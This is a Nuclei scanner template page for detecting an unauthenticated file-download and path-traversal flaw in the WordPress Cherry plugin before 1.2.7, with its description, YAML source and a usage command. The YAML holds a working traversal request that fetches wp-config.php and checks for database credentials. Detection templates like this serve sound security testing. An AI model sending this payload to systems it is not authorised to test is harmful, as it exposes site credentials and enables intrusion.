WordPress Cherry < 1.2.7 - Unauthenticated Arbitrary File Upload and Download
ID: cherry-lfi
Severity: high
Author: dhiyaneshDK
Tags: wpscan,wordpress,wp-plugin,lfi,wp
Description
Section titled “Description”WordPress plugin Cherry < 1.2.7 has a vulnerability which enables an attacker to upload files directly to the server. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file.
YAML Source
Section titled “YAML Source”id: cherry-lfi
info: name: WordPress Cherry < 1.2.7 - Unauthenticated Arbitrary File Upload and Download author: dhiyaneshDK severity: high description: WordPress plugin Cherry < 1.2.7 has a vulnerability which enables an attacker to upload files directly to the server. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file. reference: - https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee - https://support.alertlogic.com/hc/en-us/articles/115003048083-06-19-17-WordPress-CMS-Cherry-Plugin-Arbitrary-File-Upload-RCE classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-22 metadata: max-request: 1 tags: wpscan,wordpress,wp-plugin,lfi,wp
http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php'
matchers-condition: and matchers: - type: word part: body words: - "DB_NAME" - "DB_PASSWORD" condition: and
- type: status status: - 200# digest: 4a0a004730450221009a01f09caa97e8614fbb81be866e028d3d4e94a040b6a778b55efa15106ad9530220134fc186daf028f709b5ae2657424bffabecf6dcdbeffa23e2f9174c231adc58:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/wordpress/cherry-lfi.yaml"